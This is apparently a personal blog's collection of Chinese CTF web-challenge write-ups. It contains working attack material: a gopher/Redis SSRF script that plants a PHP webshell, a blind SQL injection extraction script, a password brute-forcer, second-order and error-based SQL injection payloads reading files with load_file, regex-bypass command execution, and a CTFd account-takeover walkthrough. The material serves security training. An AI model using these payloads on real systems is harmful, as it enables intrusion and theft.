[MRCTF2020]套娃

F12源码

$query = $_SERVER['QUERY_STRING'];

 if( substr_count($query, '_') !== 0 || substr_count($query, '%5f') != 0 ){
  die('Y0u are So cutE!');
}
 if($_GET['b_u_p_t'] !== '23333' && preg_match('/^23333$/', $_GET['b_u_p_t'])){
  echo "you are going to the next ~";
}

于是我们就要想办法绕过

参考这篇文章

Payload:

?b%20u%20p%20t=23333%0a

然后给了一个网页,进去后源码看到一串显然是加密的内容



应该是jsfuck,解密得到post me Merak

<?php 
error_reporting(0); 
include 'takeip.php';
ini_set('open_basedir','.'); 
include 'flag.php';

if(isset($_POST['Merak'])){ 
  highlight_file(__FILE__); 
  die(); 
} 


function change($v){ 
  $v = base64_decode($v); 
  $re = ''; 
  for($i=0;$i<strlen($v);$i++){ 
    $re .= chr ( ord ($v[$i]) + $i*2 ); 
  } 
  return $re; 
}
echo 'Local access only!'."<br/>";
$ip = getIp();
if($ip!='127.0.0.1')
echo "Sorry,you don't have permission! Your ip is :".$ip;
if($ip === '127.0.0.1' && file_get_contents($_GET['2333']) === 'todat is a happy day' ){
echo "Your REQUEST is:".change($_GET['file']);
echo file_get_contents(change($_GET['file'])); }
?>

Data协议绕过第一层,判断ip一般就是Client-ipX-Forwarded-For,然后change要修改一下,解密一波

最后得到Payload

?2333=data:text/plain,todat is a happy day&file=ZmpdYSZmXGI=
image.png

[GKCTF2020]EZ三剑客-EzWeb

输入127.0.0.1提示别这样,那我输入127.0.0.2,发现包含了我们输入页面的内容

然后F12看源码,知道了输入额外GET参数?secret可以看点别的,然后看到一些额外的内容

image.png

那么似乎就是一个打内网的问题了,子网掩码255.255.255.0,只有最后一位,利用Burpsuite爆破

image.png

好的,现在确定是173.173.245.12了,需要对端口进行扫描,于是不会了,上网找WP

于是是Redis服务,找个现成的脚本

import urllib
protocol="gopher://"
ip="173.173.245.12"
port="6379"
shell="nn<?php system("cat /flag");?>nn"
filename="shell.php"
path="/var/www/html"
passwd=""
cmd=["flushall",
   "set 1 {}".format(shell.replace(" ","${IFS}")),
   "config set dir {}".format(path),
   "config set dbfilename {}".format(filename),
   "save"
   ]
if passwd:
  cmd.insert(0,"AUTH {}".format(passwd))
payload=protocol+ip+":"+port+"/_"
def redis_format(arr):
  CRLF="rn"
  redis_arr = arr.split(" ")
  cmd=""
  cmd+="*"+str(len(redis_arr))
  for x in redis_arr:
    cmd+=CRLF+"$"+str(len((x.replace("${IFS}"," "))))+CRLF+x.replace("${IFS}"," ")
  cmd+=CRLF
  return cmd

if __name__=="__main__":
  for x in cmd:
    payload += urllib.quote(redis_format(x))
  print payload
image.png

[BJDCTF 2nd]elementmaster

完全不明白这题意思,直接上网找题解

然后,这题真的不应该放在Misc分类里面么。。。

懒得写详细内容了,直接放脚本吧。。。

import requests
import time

url='http://724f7341-dfec-498d-aa77-a470d2f2c624.node3.buuoj.cn/'
flag=''
element=['H', 'He', 'Li', 'Be', 'B', 'C', 'N', 'O', 'F', 'Ne', 'Na', 'Mg', 'Al', 'Si', 'P', 'S', 'Cl', 'Ar',
    'K', 'Ca', 'Sc', 'Ti', 'V', 'Cr', 'Mn', 'Fe', 'Co', 'Ni', 'Cu', 'Zn', 'Ga', 'Ge', 'As', 'Se', 'Br',
    'Kr', 'Rb', 'Sr', 'Y', 'Zr', 'Nb', 'Mo', 'Te', 'Ru', 'Rh', 'Pd', 'Ag', 'Cd', 'In', 'Sn', 'Sb', 'Te',
    'I', 'Xe', 'Cs', 'Ba', 'La', 'Ce', 'Pr', 'Nd', 'Pm', 'Sm', 'Eu', 'Gd', 'Tb', 'Dy', 'Ho', 'Er', 'Tm',
    'Yb', 'Lu', 'Hf', 'Ta', 'W', 'Re', 'Os', 'Ir', 'Pt', 'Au', 'Hg', 'Tl', 'Pb', 'Bi', 'Po', 'At', 'Rn',
    'Fr', 'Ra', 'Ac', 'Th', 'Pa', 'U', 'Np', 'Pu', 'Am', 'Cm', 'Bk', 'Cf', 'Es', 'Fm','Md', 'No', 'Lr',
    'Rf', 'Db', 'Sg', 'Bh', 'Hs', 'Mt', 'Ds', 'Rg', 'Cn', 'Nh', 'Fl', 'Mc', 'Lv', 'Ts', 'Og', 'Uue']

for i in element:
  r=requests.get(url + i + '.php')
  time.sleep(0.1)
  if r.status_code == 200:
    flag+=r.text
    print(flag)
image.png

访问得到flag

[WUSTCTF2020]颜值成绩查询

输入1~4,存在几个人,有不同的成绩

但是注意到我们输入1+1,和输入2的效果是一致的,推测这里存在一个命令执行的问题,不过SQL的话应该就是盲注了。

直接上盲注脚本

import sys
import requests
import string
import time

config_html = 'http://7ad4422f-8918-451b-b065-9c29f768ba12.node3.buuoj.cn/index.php'

config_method = 'GET'

config_key = 'stunum'

config_data = {
  'stunum' : 'if({0},1,0)#'
}

config_length = 'char_length({0}){1}'

config_line = 'ascii(substr({0},{1},1)){2}'

config_success_flag = 'admin'

config_failed_flag = 'not exists'

config_retry_time = 0.1

config_headers = {
  'User-Agent':'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:60.0) Gecko/20100101 Firefox/60.0',
  'Accept-Language':'zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2',
  'DNT':'1',
  'Connection':'close'
}

config_data_range = string.digits + string.ascii_letters + '{}_,-'

config_data_range = "".join((lambda x:(x.sort(),x)[1])(list(config_data_range)))

print(config_data_range)

def get(url,data):
  if config_method == 'GET':
    r = requests.get(url = url,params = data,headers = config_headers,timeout = 3)
  else:
    r = requests.post(url = url,data = data,headers = config_headers,timeout = 3)
  while r.status_code != 200:
    print('[-] Retry to connect...')
    time.sleep(config_retry_time)
    if config_method == 'GET':
      r = requests.get(url = url,params = data,headers = config_headers,timeout = 3)
    else:
      r = requests.post(url = url,data = data,headers = config_headers,timeout = 3)
  r.encoding = 'UTF-8'
  #print(r.text)
  if config_success_flag in r.text:
    return True
  elif config_failed_flag in r.text:
    return False
  else:
    print('Error: method error!')
    return False

def cfg_data(par):
  data = config_data.copy()
  data[config_key] = data[config_key].format(par)
  return data

def concat_line_length(cmd,i):
  return config_length.format(cmd,'>' + str(i))

def concat_line_value(cmd,i,nowlen):
  return config_line.format(cmd,nowlen+1,'>' + str(ord(i)))

def get_length_line(cmd):
  for i in range(0,255):
    time.sleep(config_retry_time)
    #print(cfg_data(concat_line_length(cmd,i)))
    if get(url = config_html,data = cfg_data(concat_line_length(cmd,i))):
      print('[-] {0} NOT length: {1}'.format(cmd,i))
      continue
    else:
      print('[+] {0} length: {1}'.format(cmd,i))
      return i
  print('[-] Search Length Failed...')
  return 0

def get_value_line(cmd,length,preline):
  ret = list(preline)
  for l in range(length - len(preline)):
    fg = False
    for i in config_data_range:
      #print(config_data_range)
      #print(i)
      time.sleep(config_retry_time)
      #print(cfg_data(concat_line_value(cmd,i,l+len(preline))))
      if get(url = config_html,data = cfg_data(concat_line_value(cmd,i,l+len(preline)))):
        continue
      else:
        fg = True
        ret.append(i)
        #print(ret)
        print('[+] {0} : {1}'.format(cmd,''.join(ret)))
        break
    if fg == False:
      ret.append(config_data_range[-1])
      print('[+] {0} : {1}'.format(cmd,''.join(ret)))
      break
  return ret

def database():
  cmd = 'database()'
  length = get_length_line(cmd)
  print(get_value_line(cmd,length,''))

database()

def table():
  cmd = "(SELECT(group_concat(table_name))FROM(information_schema.tables)WHERE(table_schema='ctf'))"
  length = get_length_line(cmd)
  print(get_value_line(cmd,length,''))

table()

def column():
  cmd = "(SELECT(group_concat(column_name))FROM(information_schema.columns)WHERE(table_name='flag'))"
  length = get_length_line(cmd)
  print(get_value_line(cmd,length,''))

column()

def flag():
  cmd = "(SELECT(value)FROM(flag))"
  length = get_length_line(cmd)
  print(get_value_line(cmd,length,''))

flag()
image.png

[网鼎杯 2018]Comment

发言需要登录,发现框里面是zhangweizhangwei***,推测是一个弱密码

爆破一下

image.png
import requests
import string
import time

html = 'http://5e7cdeb0-8242-4b9e-830f-845694902ca7.node3.buuoj.cn/login.php'

letter = string.digits

key = {
  'username': 'zhangwei',
  'password': 'zhangwei{0}'
}

def get():
  for i in letter:
    for j in letter:
      for k in letter:
        data = key.copy()
        data['password'] = data['password'].format(i + j +k)
        r = requests.post(html,data=data,cookies = {'PHPSESSID':'47p66o1t0g19bfj3866n9uso52'})
        print('[+] {0} : LENGTH = {1}'.format(i + j + k,len(r.text)))
        time.sleep(0.1)

get()
image.png

得到666,从而概括出以下内容:

username = zhangwei
password = zhangwei666

登录,进入留言板主界面

随便测了一下发现可以XSS,但是没有XSS Bot,所以应该还是注入题。带详情的话可能是二次注入。

然后在提交留言的时候试验一下,发现在正文之类的地方放上'/**/AND/**/1=2/**/UNION/**/SELECT/**/1,2,3,4#提交不上去。猜测可能更新的时候被注释掉了。那么确实存在注入,思考注入方式。

然后不会了,百度找WP得知是.git文件泄露,所以我们可以恢复一下。

git log --reflog
commit e5b2a2443c2b6d395d06960123142bc91123148c (refs/stash)
Merge: bfbdf21 5556e3a
Author: root <[email protected]>
Date:  Sat Aug 11 22:51:17 2018 +0800

  WIP on master: bfbdf21 add write_do.php

commit 5556e3ad3f21a0cf5938e26985a04ce3aa73faaf
Author: root <[email protected]>
Date:  Sat Aug 11 22:51:17 2018 +0800

  index on master: bfbdf21 add write_do.php

commit bfbdf218902476c5c6164beedd8d2fcf593ea23b (HEAD -> master)
Author: root <[email protected]>
Date:  Sat Aug 11 22:47:29 2018 +0800

  add write_do.php
git reset --hard e5b2a2443c2b6d395d06960123142bc91123148c
HEAD is now at e5b2a24 WIP on master: bfbdf21 add write_do.php
<?php
include "mysql.php";
session_start();
if($_SESSION['login'] != 'yes'){
  header("Location: ./login.php");
  die();
}
if(isset($_GET['do'])){
switch ($_GET['do'])
{
case 'write':
  $category = addslashes($_POST['category']);
  $title = addslashes($_POST['title']);
  $content = addslashes($_POST['content']);
  $sql = "insert into board
      set category = '$category',
        title = '$title',
        content = '$content'";
  $result = mysql_query($sql);
  header("Location: ./index.php");
  break;
case 'comment':
  $bo_id = addslashes($_POST['bo_id']);
  $sql = "select category from board where id='$bo_id'";
  $result = mysql_query($sql);
  $num = mysql_num_rows($result);
  if($num>0){
  $category = mysql_fetch_array($result)['category'];
  $content = addslashes($_POST['content']);
  $sql = "insert into comment
      set category = '$category',
        content = '$content',
        bo_id = '$bo_id'";
  $result = mysql_query($sql);
  }
  header("Location: ./comment.php?id=$bo_id");
  break;
default:
  header("Location: ./index.php");
}
}
else{
  header("Location: ./index.php");
}
?>

然后就是绕过addslashes了,参考这篇文章

首先要知道即使是addslashes时,进入数据库的内容也是没有反斜杠的。

那么我们可以这么注入:

首先在category字段写入正常的字段

然后在留言中写入闭合部分,即可完成一次查询。

举个例子:

第一步:category写入字段

',content=user(),/*

此时会转义并存入数据库,内容此时是:

category = ',content=user(),/*

第二步:category取出注入

注意到在case=comment时,category被取出,此时是没有反斜杠的,然后我们在comment写入闭合insert语句即可。

*/#

试一下:

image.png

bash_history

',content=(select load_file('/home/www/.bash_history')),/*
image.png

发现.DS_Store,在/tmp里面解压了但是没删掉,只删掉了/var/www/html里面的,所以就可以读取了。

',content=(select(hex(load_file("/tmp/html/.DS_Store")))),/*

Burpsuite Decoder解密

image.png

读取flag

',content=(select(hex(load_file('/var/www/html/flag_8946e1ff1ee3e40f.php')))),/*

返回flag

<?php
  $flag="flag{032524c0-d105-45fc-bf34-7574d1e9a964}";
?>

[FBCTF2019]RCEService

这题提示约等于没有,几乎不懂这是干啥

不过试了下,可以这么执行命令

{"cmd":"ls"}
image.png

试试whoami,然而没有返回,可能是屏蔽了

貌似过滤了相当多的字符,不会了,找WP去

然后WP说有源码。。。

<?php

putenv('PATH=/home/rceservice/jail');

if (isset($_REQUEST['cmd'])) {
 $json = $_REQUEST['cmd'];

 if (!is_string($json)) {
  echo 'Hacking attempt detected<br/><br/>';
 } elseif (preg_match('/^.*(alias|bg|bind|break|builtin|case|cd|command|compgen|complete|continue|declare|dirs|disown|echo|enable|eval|exec|exit|export|fc|fg|getopts|hash|help|history|if|jobs|kill|let|local|logout|popd|printf|pushd|pwd|read|readonly|return|set|shift|shopt|source|suspend|test|times|trap|type|typeset|ulimit|umask|unalias|unset|until|wait|while|[x00-x1FA-Z0-9!#-/;-@[-`|~x7F]+).*$/', $json)) {
  echo 'Hacking attempt detected<br/><br/>';
 } else {
  echo 'Attempting to run command:<br/>';
  $cmd = json_decode($json, true)['cmd'];
  if ($cmd !== NULL) {
   system($cmd);
  } else {
   echo 'Invalid input';
  }
  echo '<br/><br/>';
 }
}
?>

按照WP的说法,preg_match只会匹配一行,那么%0a就可以绕过。

但是我发现必须要前后各有一个%0a才行,不太清楚为何,以后有空试一下。

Payload

http://2593d3de-1a1b-427b-a411-62bea5cee431.node3.buuoj.cn/?cmd=%7B%0a%22cmd%22%3A%22/bin/cat%20/home/rceservice/flag%22%0a%7D

[BSidesCF 2019]Kookie

给了一个账户cookie/monster,然后我们就可以登录一下,然后发现cookie记录了username,我们把username改成admin试试。

然后就过了。。。

image.png

[CISCN2019 华北赛区 Day1 Web5]CyberPunk

一个订单界面,可以输入姓名、电话、地址。

可以根据姓名和电话查询或修改住址,也可以删除订单。

那么可以猜测是一个二次注入,先添加一个订单然后一直修改可以注入的地址。

试了一下,貌似有转义,所以应该要拿到源码或提示才能继续。

看源码,发现了一个细节

image.png

那我们看看能不能读取些东西,事实证明可以,用PHP伪协议来读取内容。

confirm.php

<?php

require_once "config.php";
//var_dump($_POST);

if(!empty($_POST["user_name"]) && !empty($_POST["address"]) && !empty($_POST["phone"]))
{
  $msg = '';
  $pattern = '/select|insert|update|delete|and|or|join|like|regexp|where|union|into|load_file|outfile/i';
  $user_name = $_POST["user_name"];
  $address = $_POST["address"];
  $phone = $_POST["phone"];
  if (preg_match($pattern,$user_name) || preg_match($pattern,$phone)){
    $msg = 'no sql inject!';
  }else{
    $sql = "select * from `user` where `user_name`='{$user_name}' and `phone`='{$phone}'";
    $fetch = $db->query($sql);
  }

  if($fetch->num_rows>0) {
    $msg = $user_name."已提交订单";
  }else{
    $sql = "insert into `user` ( `user_name`, `address`, `phone`) values( ?, ?, ?)";
    $re = $db->prepare($sql);
    $re->bind_param("sss", $user_name, $address, $phone);
    $re = $re->execute();
    if(!$re) {
      echo 'error';
      print_r($db->error);
      exit;
    }
    $msg = "订单提交成功";
  }
} else {
  $msg = "信息不全";
}
?>

<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="utf-8">
<title>确认订单</title>
<base href="./">
<meta charset="utf-8"/>

<link href="assets/css/bootstrap.css" rel="stylesheet">
<link href="assets/css/custom-animations.css" rel="stylesheet">
<link href="assets/css/style.css" rel="stylesheet">

</head>
<body>
<div id="h">
  <div class="container">
    <img class="logo" src="./assets/img/logo-zh.png">
    <div class="row">
      <div class="col-md-8 col-md-offset-2 centered">
        <?php global $msg; echo '<h2 class="mb">'.$msg.'</h2>';?>
        <a href="./index.php">
        <button class='btn btn-lg btn-sub btn-white'>返回</button>
        </a>
      </div>
    </div>
  </div>
</div>

<div id="f">
  <div class="container">
    <div class="row">
      <p style="margin:35px 0;"><br></p>
      <h2 class="mb">订单管理</h2>
      <a href="./search.php">
        <button class="btn btn-lg btn-register btn-white" >我要查订单</button>
      </a>
      <a href="./change.php">
        <button class="btn btn-lg btn-register btn-white" >我要修改收货地址</button>
      </a>
      <a href="./delete.php">
        <button class="btn btn-lg btn-register btn-white" >我不想要了</button>
      </a>
    </div>
  </div>
</div>

<script src="assets/js/jquery.min.js"></script>
<script src="assets/js/bootstrap.min.js"></script>
<script src="assets/js/retina-1.1.0.js"></script>
<script src="assets/js/jquery.unveilEffects.js"></script>
</body>
</html>

search.php

<?php

require_once "config.php"; 

if(!empty($_POST["user_name"]) && !empty($_POST["phone"]))
{
  $msg = '';
  $pattern = '/select|insert|update|delete|and|or|join|like|regexp|where|union|into|load_file|outfile/i';
  $user_name = $_POST["user_name"];
  $phone = $_POST["phone"];
  if (preg_match($pattern,$user_name) || preg_match($pattern,$phone)){ 
    $msg = 'no sql inject!';
  }else{
    $sql = "select * from `user` where `user_name`='{$user_name}' and `phone`='{$phone}'";
    $fetch = $db->query($sql);
  }

  if (isset($fetch) && $fetch->num_rows>0){
    $row = $fetch->fetch_assoc();
    if(!$row) {
      echo 'error';
      print_r($db->error);
      exit;
    }
    $msg = "<p>姓名:".$row['user_name']."</p><p>, 电话:".$row['phone']."</p><p>, 地址:".$row['address']."</p>";
  } else {
    $msg = "未找到订单!";
  }
}else {
  $msg = "信息不全";
}
?>
<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>搜索</title>
<base href="./">

<link href="assets/css/bootstrap.css" rel="stylesheet">
<link href="assets/css/custom-animations.css" rel="stylesheet">
<link href="assets/css/style.css" rel="stylesheet">

</head>
<body>
<div id="h">
  <div class="container">
    <div class="row">
      <div class="col-md-8 col-md-offset-2 centered">
        <p style="margin:35px 0;"><br></p>
        <h1>订单查询</h1>
        <form method="post">
          <p>
          <h3>姓名:</h3>
          <input type="text" class="subscribe-input" name="user_name">
          <h3>电话:</h3>
          <input type="text" class="subscribe-input" name="phone">
          </p>
          <p>
          <button class='btn btn-lg btn-sub btn-white' type="submit">查询订单</button>
          </p>
        </form>
        <?php global $msg; echo '<h2 class="mb">'.$msg.'</h2>';?>
      </div>
    </div>
  </div>
</div>

<div id="f">
  <div class="container">
    <div class="row">
      <p style="margin:35px 0;"><br></p>
      <h2 class="mb">订单管理</h2>
      <a href="./index.php">
        <button class='btn btn-lg btn-register btn-sub btn-white'>返回</button>
      </a>
      <a href="./change.php">
        <button class="btn btn-lg btn-register btn-white" >我要修改收货地址</button>
      </a> 
      <a href="./delete.php">
        <button class="btn btn-lg btn-register btn-white" >我不想要了</button>
      </a>  
    </div>
  </div>
</div>

<script src="assets/js/jquery.min.js"></script>
<script src="assets/js/bootstrap.min.js"></script>
<script src="assets/js/retina-1.1.0.js"></script>
<script src="assets/js/jquery.unveilEffects.js"></script>
</body>
</html>

index.php

<?php

ini_set('open_basedir', '/var/www/html/');

// $file = $_GET["file"];
$file = (isset($_GET['file']) ? $_GET['file'] : null);
if (isset($file)){
  if (preg_match("/phar|zip|bzip2|zlib|data|input|%00/i",$file)) {
    echo('no way!');
    exit;
  }
  @include($file);
}
?>

<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="utf-8">
<title>index</title>
<base href="./">
<meta charset="utf-8" />

<link href="assets/css/bootstrap.css" rel="stylesheet">
<link href="assets/css/custom-animations.css" rel="stylesheet">
<link href="assets/css/style.css" rel="stylesheet">

</head>
<body>
<div id="h">
  <div class="container">
    <h2>2077发售了,不来份实体典藏版吗?</h2>
    <img class="logo" src="./assets/img/logo-en.png"><!--LOGOLOGOLOGOLOGO-->
    <div class="row">
      <div class="col-md-8 col-md-offset-2 centered">
        <h3>提交订单</h3>
        <form role="form" action="./confirm.php" method="post" enctype="application/x-www-urlencoded">
          <p>
          <h3>姓名:</h3>
          <input type="text" class="subscribe-input" name="user_name">
          <h3>电话:</h3>
          <input type="text" class="subscribe-input" name="phone">
          <h3>地址:</h3>
          <input type="text" class="subscribe-input" name="address">
          </p>
          <button class='btn btn-lg btn-sub btn-white' type="submit">我正是送钱之人</button>
        </form>
      </div>
    </div>
  </div>
</div>

<div id="f">
  <div class="container">
    <div class="row">
      <h2 class="mb">订单管理</h2>
      <a href="./search.php">
        <button class="btn btn-lg btn-register btn-white" >我要查订单</button>
      </a>
      <a href="./change.php">
        <button class="btn btn-lg btn-register btn-white" >我要修改收货地址</button>
      </a>
      <a href="./delete.php">
        <button class="btn btn-lg btn-register btn-white" >我不想要了</button>
      </a>
    </div>
  </div>
</div>

<script src="assets/js/jquery.min.js"></script>
<script src="assets/js/bootstrap.min.js"></script>
<script src="assets/js/retina-1.1.0.js"></script>
<script src="assets/js/jquery.unveilEffects.js"></script>
</body>
</html>
<!--?file=?-->

delete.php

<?php

require_once "config.php";

if(!empty($_POST["user_name"]) && !empty($_POST["phone"]))
{
  $msg = '';
  $pattern = '/select|insert|update|delete|and|or|join|like|regexp|where|union|into|load_file|outfile/i';
  $user_name = $_POST["user_name"];
  $phone = $_POST["phone"];
  if (preg_match($pattern,$user_name) || preg_match($pattern,$phone)){ 
    $msg = 'no sql inject!';
  }else{
    $sql = "select * from `user` where `user_name`='{$user_name}' and `phone`='{$phone}'";
    $fetch = $db->query($sql);
  }

  if (isset($fetch) && $fetch->num_rows>0){
    $row = $fetch->fetch_assoc();
    $result = $db->query('delete from `user` where `user_id`=' . $row["user_id"]);
    if(!$result) {
      echo 'error';
      print_r($db->error);
      exit;
    }
    $msg = "订单删除成功";
  } else {
    $msg = "未找到订单!";
  }
}else {
  $msg = "信息不全";
}
?>
<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>删除订单</title>
<base href="./">
<meta charset="utf-8" />

<link href="assets/css/bootstrap.css" rel="stylesheet">
<link href="assets/css/custom-animations.css" rel="stylesheet">
<link href="assets/css/style.css" rel="stylesheet">

</head>
<body>
<div id="h">
  <div class="container">
    <div class="row">
      <div class="col-md-8 col-md-offset-2 centered">
        <p style="margin:35px 0;"><br></p>
        <h1>删除订单</h1>
        <form method="post">
          <p>
          <h3>姓名:</h3>
          <input type="text" class="subscribe-input" name="user_name">
          <h3>电话:</h3>
          <input type="text" class="subscribe-input" name="phone">
          </p>
          <p>
          <button class='btn btn-lg btn-sub btn-white' type="submit">删除订单</button>
          </p>
        </form>
        <?php global $msg; echo '<h2 class="mb" style="color:#ffffff;">'.$msg.'</h2>';?>
      </div>
    </div>
  </div>
</div>
<div id="f">
  <div class="container">
    <div class="row">
      <h2 class="mb">订单管理</h2>
      <a href="./index.php">
        <button class='btn btn-lg btn-register btn-sub btn-white'>返回</button>
      </a>
      <a href="./search.php">
        <button class="btn btn-lg btn-register btn-white" >我要查订单</button>
      </a>
      <a href="./change.php">
        <button class="btn btn-lg btn-register btn-white" >我要修改收货地址</button>
      </a>
    </div>
  </div>
</div>

<script src="assets/js/jquery.min.js"></script>
<script src="assets/js/bootstrap.min.js"></script>
<script src="assets/js/retina-1.1.0.js"></script>
<script src="assets/js/jquery.unveilEffects.js"></script>
</body>
</html>

config.php

<?php

ini_set("open_basedir", getcwd() . ":/etc:/tmp");

$DATABASE = array(

  "host" => "127.0.0.1",
  "username" => "root",
  "password" => "root",
  "dbname" =>"ctfusers"
);

$db = new mysqli($DATABASE['host'],$DATABASE['username'],$DATABASE['password'],$DATABASE['dbname']);
?>

change.php

<?php

require_once "config.php";

if(!empty($_POST["user_name"]) && !empty($_POST["address"]) && !empty($_POST["phone"]))
{
  $msg = '';
  $pattern = '/select|insert|update|delete|and|or|join|like|regexp|where|union|into|load_file|outfile/i';
  $user_name = $_POST["user_name"];
  $address = addslashes($_POST["address"]);
  $phone = $_POST["phone"];
  if (preg_match($pattern,$user_name) || preg_match($pattern,$phone)){
    $msg = 'no sql inject!';
  }else{
    $sql = "select * from `user` where `user_name`='{$user_name}' and `phone`='{$phone}'";
    $fetch = $db->query($sql);
  }

  if (isset($fetch) && $fetch->num_rows>0){
    $row = $fetch->fetch_assoc();
    $sql = "update `user` set `address`='".$address."', `old_address`='".$row['address']."' where `user_id`=".$row['user_id'];
    $result = $db->query($sql);
    if(!$result) {
      echo 'error';
      print_r($db->error);
      exit;
    }
    $msg = "订单修改成功";
  } else {
    $msg = "未找到订单!";
  }
}else {
  $msg = "信息不全";
}
?>
<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>修改收货地址</title>
<base href="./">

<link href="assets/css/bootstrap.css" rel="stylesheet">
<link href="assets/css/custom-animations.css" rel="stylesheet">
<link href="assets/css/style.css" rel="stylesheet">

</head>
<body>
<div id="h">
  <div class="container">
    <div class="row">
      <div class="col-md-8 col-md-offset-2 centered">
        <p style="margin:35px 0;"><br></p>
        <h1>修改收货地址</h1>
        <form method="post">
          <p>
          <h3>姓名:</h3>
          <input type="text" class="subscribe-input" name="user_name">
          <h3>电话:</h3>
          <input type="text" class="subscribe-input" name="phone">
          <h3>地址:</h3>
          <input type="text" class="subscribe-input" name="address">
          </p>
          <p>
          <button class='btn btn-lg btn-sub btn-white' type="submit">修改订单</button>
          </p>
        </form>
        <?php global $msg; echo '<h2 class="mb">'.$msg.'</h2>';?>
      </div>
    </div>
  </div>
</div>

<div id="f">
  <div class="container">
    <div class="row">
      <p style="margin:35px 0;"><br></p>
      <h2 class="mb">订单管理</h2>
      <a href="./index.php">
        <button class='btn btn-lg btn-register btn-sub btn-white'>返回</button>
      </a>
      <a href="./search.php">
        <button class="btn btn-lg btn-register btn-white" >我要查订单</button>
      </a>
      <a href="./delete.php">
        <button class="btn btn-lg btn-register btn-white" >我不想要了</button>
      </a>
    </div>
  </div>
</div>

<script src="assets/js/jquery.min.js"></script>
<script src="assets/js/bootstrap.min.js"></script>
<script src="assets/js/retina-1.1.0.js"></script>
<script src="assets/js/jquery.unveilEffects.js"></script>
</body>
</html>

审计源码,发现了会输出错误信息,结合之前我们的判断(二次注入)可以推测出是基于报错的二次注入,然后我们来分析利用方式。

confirm.php中,我们发现添加订单时用的是bind,几乎无法注入

change.php中,我们发现addressaddslashes处理后存入了数据库。但是在修改时,旧地址没有任何处理就被重新update了。而addslashes存入数据库的内容是没有反斜杠的,这里就存在一个报错注入了。

delete.php中直接删除整行,那么我们就能反复利用这一点,避免了一次报错完了就不能用了。

那么利用方式呼之欲出了:随便加个订单,修改地址为payload,再修改地址为正常地址。看完再删除掉订单,用同样的方法再看下一段。

根据CISCN的特点,flag形式是文件形式存储在/flag.txt,那我们用load_file来读取内容。注意到本身address参数并没有被严格过滤。

我们操作一下:

' where user_id=extractvalue(0,concat(0x7e,(select load_file('/flag.txt'))))#
image.png
' where user_id=extractvalue(0,concat(0x7e,(select substr(load_file('/flag.txt'),20,50))))#
image.png
flag{6737cbe1-eede-440f-a011-061e672cfec5}

[V&N2020 公开赛]HappyCTFd

CTFd平台。猜测是随便搭建的,不过管理员密码会在设置开始时创建,没有默认的,所以应该不能直接得到。

Users,确实存在admin用户。

注册一个用户,测试一下。看了一圈一点思路没有,上网找WP去。

找了一下,发现这篇文章,是一个CVE。那就照着复现一下。

buuoj内网资源注册一个邮箱,然后我们来注册一个用户 admin,邮箱填我们注册的内网邮箱。

image.png

然后我们退出->忘记密码。

image.png

收到邮件

image.png

修改密码,重新登陆,进入管理员界面,看到题目

image.png

下载文件,得到flag

image.png

[Zer0pts2020]Can you guess it?

给了源码

<?php
include 'config.php'; // FLAG is defined in config.php

if (preg_match('/config.php/*$/i', $_SERVER['PHP_SELF'])) {
 exit("I don't know what you are thinking, but I won't let you read it :)");
}

if (isset($_GET['source'])) {
 highlight_file(basename($_SERVER['PHP_SELF']));
 exit();
}

$secret = bin2hex(random_bytes(64));
if (isset($_POST['guess'])) {
 $guess = (string) $_POST['guess'];
 if (hash_equals($secret, $guess)) {
  $message = 'Congratulations! The flag is: ' . FLAG;
 } else {
  $message = 'Wrong.';
 }
}
?>
<!doctype html>
<html lang="en">
 <head>
  <meta charset="utf-8">
  <title>Can you guess it?</title>
 </head>
 <body>
  <h1>Can you guess it?</h1>
  <p>If your guess is correct, I'll give you the flag.</p>
  <p><a href="?source">Source</a></p>
  <hr>
<?php if (isset($message)) { ?>
  <p><?= $message ?></p>
<?php } ?>
  <form action="index.php" method="POST">
   <input type="text" name="guess">
   <input type="submit">
  </form>
 </body>
</html>

生成了随机串后用hash_equals这个函数进行比较,比较成功就可以有flag

所以看了一下貌似这个函数大致相当于==,那么我们测试一下,发现不行。

找WP去,原来是basename函数的问题。

Payload

index.php/config.php/%ff?source

理解一下:首先是绕过preg_match,匹配内容是:

/config.php/*$/i

从后面匹配,这个可以用index.php/config.php/%ef之类的方式绕过。就是在最后随便加一点字符串就行。其实只是单纯为了绕过也可以加点ASCII字符。(根据正则匹配规则)

然后我们就可以用basename绕过。这个部分在这篇文章写了,非ASCII字符在开头结尾会被去除。组合起来就得到了我们的flag

It is my final heart.
最后更新于 2022-07-24